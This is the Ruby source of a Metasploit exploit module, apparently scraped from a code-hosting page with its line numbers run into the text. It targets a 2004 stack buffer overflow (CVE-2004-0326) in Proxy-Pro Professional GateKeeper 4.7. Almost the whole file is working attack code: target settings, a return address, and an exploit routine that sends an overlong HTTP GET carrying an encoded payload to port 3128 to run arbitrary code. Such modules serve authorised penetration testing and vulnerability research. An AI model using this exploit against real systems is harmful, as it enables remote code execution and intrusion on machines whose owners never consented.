Path: blob/master/modules/exploits/windows/proxy/proxypro_http_get.rb
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow',15'Description' => %q{16This module exploits a stack buffer overflow in Proxy-Pro Professional17GateKeeper 4.7. By sending a long HTTP GET to the default port18of 3128, a remote attacker could overflow a buffer and execute19arbitrary code.20},21'Author' => 'MC',22'License' => MSF_LICENSE,23'References' => [24['CVE', '2004-0326'],25['OSVDB', '4027'],26['BID', '9716'],27],28'DefaultOptions' => {29'EXITFUNC' => 'process',30},31'Payload' => {32'Space' => 500,33'BadChars' => "\x00+&=%\x0a\x0d\x20",34'StackAdjustment' => -3500,35},36'Platform' => 'win',37'Targets' => [38[ 'Proxy-Pro GateKeeper 4.7', { 'Ret' => 0x03b1e121 } ], # GKService.exe39],40'Privileged' => true,41'DisclosureDate' => '2004-02-23',42'DefaultTarget' => 0,43'Notes' => {44'Reliability' => UNKNOWN_RELIABILITY,45'Stability' => UNKNOWN_STABILITY,46'SideEffects' => UNKNOWN_SIDE_EFFECTS47}48)49)5051register_options(52[53Opt::RPORT(3128)54]55)56end5758def exploit59connect6061print_status("Trying target #{target.name}...")6263sploit = "GET /" + rand_text_english(3603, payload_badchars)64sploit += payload.encoded + [target.ret].pack('V') + make_nops(10)65sploit += "\xe9" + [-497].pack('V') + " HTTP/1.0" + "\r\n\r\n"6667sock.put(sploit)68sock.get_once(-1, 3)6970handler71disconnect72end73end747576